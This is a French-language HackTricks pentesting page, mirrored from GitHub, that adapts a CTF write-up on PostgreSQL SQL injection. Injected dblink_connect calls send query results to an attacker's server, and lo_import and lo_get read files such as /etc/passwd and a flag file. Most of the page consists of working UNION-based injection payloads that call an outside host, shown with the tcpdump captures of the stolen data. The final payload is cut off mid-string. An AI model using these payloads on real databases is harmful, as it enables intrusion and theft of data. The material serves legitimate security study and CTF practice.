Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-18 15:08:29 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
Translator workflow af42105553 Translated to French
2023-06-03 13:10:46 +00:00

14 KiB
Raw Blame History

Exfiltration de données avec dblink/lo_import

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Ceci est un exemple de comment exfiltrer des données en chargeant des fichiers dans la base de données avec lo_import et en les exfiltrant en utilisant dblink_connect.

Préparation du serveur d'exfiltration/Injection SQL asynchrone

Extrait de: https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md

Comme pg_sleep ne provoque pas non plus de retard, nous pouvons en toute sécurité supposer que l'exécution de la requête se produit en arrière-plan ou de manière asynchrone.

Normalement, dblink_connect peut être utilisé pour ouvrir une connexion persistante à une base de données PostgreSQL distante (par exemple, SELECT dblink_connect('host=HOST user=USER password=PASSWORD dbname=DBNAME')). Comme nous pouvons contrôler le paramètre de cette fonction, nous pouvons effectuer une demande de falsification de requête côté serveur SQL vers notre propre hôte. Cela signifie que nous pouvons effectuer une injection SQL hors bande pour exfiltrer des données des résultats de requête SQL. Au moins, il y a deux façons de faire cela :

  1. Configurer un serveur DNS et déclencher ensuite la connexion à [data].our.domain afin que nous puissions voir les données dans le journal ou dans les paquets réseau DNS.
  2. Configurer un serveur PostgreSQL public, surveiller les paquets réseau entrants sur le port PostgreSQL, puis déclencher une connexion vers notre hôte avec les données exfiltrées en tant que user/dbname. Par défaut, PostgreSQL n'utilise pas SSL pour la communication, nous pouvons donc voir user/dbname en texte clair sur le réseau.

La deuxième méthode est plus facile car nous n'avons pas besoin de domaine. Nous avons seulement besoin de configurer un serveur avec une adresse IP publique, d'installer PostgreSQL, de configurer le service PostgreSQL pour écouter */0.0.0.0, et d'exécuter un analyseur de réseau (par exemple tcpdump) pour surveiller le trafic vers le port PostgreSQL (5432 par défaut).

Pour configurer PostgreSQL pour qu'il écoute sur le public, définissez listen_addresses dans postgresql.conf sur *.

listen_addresses = '*'

Pour surveiller le trafic entrant, exécutez tcpdump pour surveiller le port 5432.

sudo tcpdump -nX -i eth0 port 5432

Pour voir si nous avons une connexion avec la cible, nous pouvons essayer d'utiliser cette requête :

asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=farisv password=postgres dbname=hellofromfb')) --

Si réussi, nous obtenons un morceau de paquet réseau avec user et dbname lisibles.

17:14:11.267060 IP [54.185.163.254.50968] > [REDACTED]: Flags [P.], seq 1:43, ack 1, win 229, options [nop,nop,TS val 970078525 ecr 958693110], length 42
    0x0000:  4500 005e 9417 4000 2706 248c 36b9 a3fe  E..^..@.'.$.6...
    0x0010:  9de6 2259 c718 2061 5889 142a 9f8a cb5d  .."Y...aX..*...]
    0x0020:  8018 00e5 1701 0000 0101 080a 39d2 393d  ............9.9=
    0x0030:  3924 7ef6 0000 002a 0003 0000 7573 6572  9$~....*....user
    0x0040:  0066 6172 6973 7600 6461 7461 6261 7365  .farisv.database
    0x0050:  0068 656c 6c6f 6672 6f6d 6662 0000       .hellofromfb.

Ensuite, nous pouvons continuer à extraire la base de données en utilisant plusieurs requêtes PostgreSQL. Notez que pour chaque résultat de requête contenant des espaces blancs, nous devons convertir le résultat en hex/base64 avec la fonction encode ou remplacer l'espace blanc par un autre caractère avec la fonction replace, car cela provoquera une erreur d'exécution lors du processus dblink_connect.

Obtenir une liste de schémas :

asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(schema_name,':') FROM information_schema.schemata) || ' password=postgres dbname=postgres')) --

17:36:46.538178 IP 54.185.163.254.51018 > [REDACTED]: Flags [P.], seq 1:70, ack 1, win 229, options [nop,nop,TS val 971433789 ecr 960048322], length 69
    0x0000:  4500 0079 ecd5 4000 2706 cbb2 36b9 a3fe  E..y..@.'...6...
    0x0010:  9de6 2259 c74a 2061 1e74 4769 b404 803d  .."Y.J.a.tGi...=
    0x0020:  8018 00e5 2710 0000 0101 080a 39e6 e73d  ....'.......9..=
    0x0030:  3939 2cc2 0000 0045 0003 0000 7573 6572  99,....E....user
    0x0040:  0070 7562 6c69 633a 696e 666f 726d 6174  .public:informat
    0x0050:  696f 6e5f 7363 6865 6d61 3a70 675f 6361  ion_schema:pg_ca
    0x0060:  7461 6c6f 6700 6461 7461 6261 7365 0070  talog.database.p
    0x0070:  6f73 7467 7265 7300 00                   ostgres.

Obtenir une liste des tables dans le schéma actuel:

asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(tablename, ':') FROM pg_catalog.pg_tables WHERE schemaname=current_schema()) || ' password=postgres dbname=postgres')) --

17:38:30.515438 IP 54.185.163.254.51026 > [REDACTED]: Flags [P.], seq 1:42, ack 1, win 229, options [nop,nop,TS val 971537775 ecr 960152304], length 41
    0x0000:  4500 005d f371 4000 2706 c532 36b9 a3fe  E..].q@.'..26...
    0x0010:  9de6 2259 c752 2061 8dd4 e226 24a3 a5c5  .."Y.R.a...&$...
    0x0020:  8018 00e5 fe2b 0000 0101 080a 39e8 7d6f  .....+......9.}o
    0x0030:  393a c2f0 0000 0029 0003 0000 7573 6572  9:.....)....user
    0x0040:  0073 6561 7263 6865 7300 6461 7461 6261  .searches.databa
    0x0050:  7365 0070 6f73 7467 7265 7300 00         se.postgres.

Compter les lignes dans la table searches.

asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT COUNT(*) FROM searches) || ' password=postgres dbname=postgres')) --

17:42:39.511643 IP 54.185.163.254.51034 > [REDACTED]: Flags [P.], seq 1:35, ack 1, win 229, options [nop,nop,TS val 971786760 ecr 960401280], length 34
    0x0000:  4500 0056 7982 4000 2706 3f29 36b9 a3fe  E..Vy.@.'.?)6...
    0x0010:  9de6 2259 c75a 2061 5ec0 7df0 8611 357d  .."Y.Z.a^.}...5}
    0x0020:  8018 00e5 f855 0000 0101 080a 39ec 4a08  .....U......9.J.
    0x0030:  393e 8f80 0000 0022 0003 0000 7573 6572  9>....."....user
    0x0040:  0030 0064 6174 6162 6173 6500 706f 7374  .0.database.post
    0x0050:  6772 6573 0000                           gres.

Il semble qu'il n'y ait qu'une seule table vide dans le schéma actuel et que le flag ne soit pas dans la base de données. Nous devrons peut-être vraiment exfiltrer des données depuis /var/lib/postgresql/data/secret. Malheureusement, si nous essayons d'utiliser pg_read_file ou pg_read_binary_file pour lire le fichier, nous n'obtiendrons pas de connexion entrante, de sorte que l'utilisateur actuel peut ne pas avoir l'autorisation d'utiliser ces fonctions.

Plus d'informations sur l'injection SQL asynchrone avec PostgreSQL

Exfiltration de contenu d'objets volumineux

Il est possible de lire un fichier en utilisant des objets volumineux (https://www.postgresql.org/docs/11/lo-funcs.html). Nous pouvons utiliser lo_import pour charger le contenu du fichier dans le catalogue pg_largeobject. Si la requête réussit, nous obtiendrons l'oid de l'objet.

asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT lo_import('/var/lib/postgresql/data/secret')) || ' password=postgres dbname=postgres')) --

17:54:51.963925 IP 54.185.163.254.51046 > [REDACTED]: Flags [P.], seq 1:39, ack 1, win 229, options [nop,nop,TS val 972519214 ecr 961133706], length 38
    0x0000:  4500 005a 071f 4000 2706 b188 36b9 a3fe  E..Z..@.'...6...
    0x0010:  9de6 2259 c766 2061 26fb c8a7 bbb3 fe01  .."Y.f.a&.......
    0x0020:  8018 00e5 2272 0000 0101 080a 39f7 772e  ...."r......9.w.
    0x0030:  3949 bc8a 0000 0026 0003 0000 7573 6572  9I.....&....user
    0x0040:  0032 3436 3638 0064 6174 6162 6173 6500  .24668.database.
    0x0050:  706f 7374 6772 6573 0000                 postgres..

Nous avons obtenu 24668 comme oid, ce qui signifie que nous pouvons utiliser la fonction lo_import. Malheureusement, nous n'obtiendrons aucun résultat si nous essayons d'obtenir le contenu d'un grand objet en utilisant lo_get(24668) ou en accédant directement au catalogue pg_largeobject. Il semble que l'utilisateur actuel n'ait pas l'autorisation de lire le contenu des nouveaux objets.

Après avoir lu la documentation des grands objets dans PostgreSQL, nous pouvons découvrir que les grands objets peuvent avoir une ACL (Liste de contrôle d'accès). Cela signifie que s'il existe un ancien objet avec une ACL qui permet à l'utilisateur actuel de le lire, alors nous pouvons exfiltrer le contenu de cet objet.

Nous pouvons obtenir une liste d'oid de grands objets disponibles en les extrayant de pg_largeobject_metadata.

asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(cast(l.oid as text), ':') FROM pg_largeobject_metadata l) || ' password=postgres dbname=postgres')) --

18:06:57.172285 IP 54.185.163.254.51052 > [REDACTED]: Flags [.], seq 1:2897, ack 1, win 229, options [nop,nop,TS val 973244413 ecr 961858878], length 2896
    0x0000:  4500 0b84 7adf 4000 2606 339e 36b9 a3fe  E...z.@.&.3.6...
    0x0010:  9de6 2259 c76c 2061 8d76 e934 10c9 3972  .."Y.l.a.v.4..9r
    0x0020:  8010 00e5 a66d 0000 0101 080a 3a02 87fd  .....m......:...
    0x0030:  3954 cd3e 0000 1c94 0003 0000 7573 6572  9T.>........user
    0x0040:  0031 3635 3731 3a31 3634 3339 3a31 3635  .16571:16439:165
    0x0050:  3732 3a31 3634 3431 3a31 3634 3432 3a31  72:16441:16442:1
    0x0060:  3733 3732 3a31 3634 3434 3a31 3634 3435  7372:16444:16445
    0x0070:  3a31 3831 3534 3a31 3733 3830 3a31 3737  :18154:17380:177
    0x0080:  3038 3a31 3635 3737 3a31 3634 3530 3a31  08:16577:16450:1
    0x0090:  3634 3531 3a31 3634 3532 3a31 3634 3533  6451:16452:16453

.....
.....
.....

Nous avons une série d'oids. Nous pouvons essayer d'utiliser lo_get pour charger le contenu de l'objet. Par exemple, lo_get(16439) chargera le contenu de /etc/passwd. Comme le résultat de lo_get est bytea, nous devons le convertir en UTF8 pour qu'il puisse être ajouté à la requête.

Nous pouvons essayer de charger certains objets avec les plus petits oids pour savoir si le fichier de drapeau a été chargé auparavant. L'objet de fichier de drapeau existe avec l'oid 16444. Il n'y a pas d'espaces dans le drapeau, donc nous pouvons simplement l'afficher tel quel.

Pour charger le drapeau:

asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT convert_from(lo_get(16444), 'UTF8')) || ' password=postgres dbname=p

Plus d'informations sur oid:

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥